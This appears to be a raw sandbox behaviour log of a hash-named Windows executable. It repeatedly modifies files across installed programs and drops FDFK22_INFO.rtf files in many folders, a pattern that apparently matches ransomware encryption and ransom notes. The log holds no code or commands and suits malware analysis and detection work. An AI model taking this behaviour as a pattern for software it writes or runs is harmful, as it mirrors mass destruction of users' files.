a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\CopyDisconnect.pub a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\manifest.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\features\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ko.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fil.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoDev.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lv.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\GroupBackup.ppsx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\UseOpen.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nl.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\preloaded_data.pb 